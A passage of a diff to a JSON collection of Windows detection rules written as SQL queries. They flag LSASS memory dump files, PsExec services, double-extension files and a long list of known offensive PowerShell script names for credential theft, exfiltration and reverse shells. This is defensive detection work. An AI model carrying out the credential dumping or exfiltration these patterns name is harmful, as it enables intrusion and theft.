'%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\')" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "tags": [ + "attack.defense_evasion", + "attack.t1036.007" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", - "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "status": "test", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.001" @@ -714,3912 +735,3454 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')))" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "title": "PsExec Service File Creation", + "id": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "author": "Thomas Patzke", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\')" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_tool_psexec.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "Installation of TeamViewer Desktop", + "id": "9711de76-5d4f-4c50-a94f-21e4e8f8384d", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "TeamViewer_Desktop.exe is create during install", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\TeamViewer\\_Desktop.exe' ESCAPE '\\')" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_install_teamviewer_desktop.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", - "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", + "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" + "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" }, { - "title": "Azure AD Health Monitoring Agent Registry Keys Access", - "id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Microsoft Online\\\\Reporting\\\\MonitoringAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' 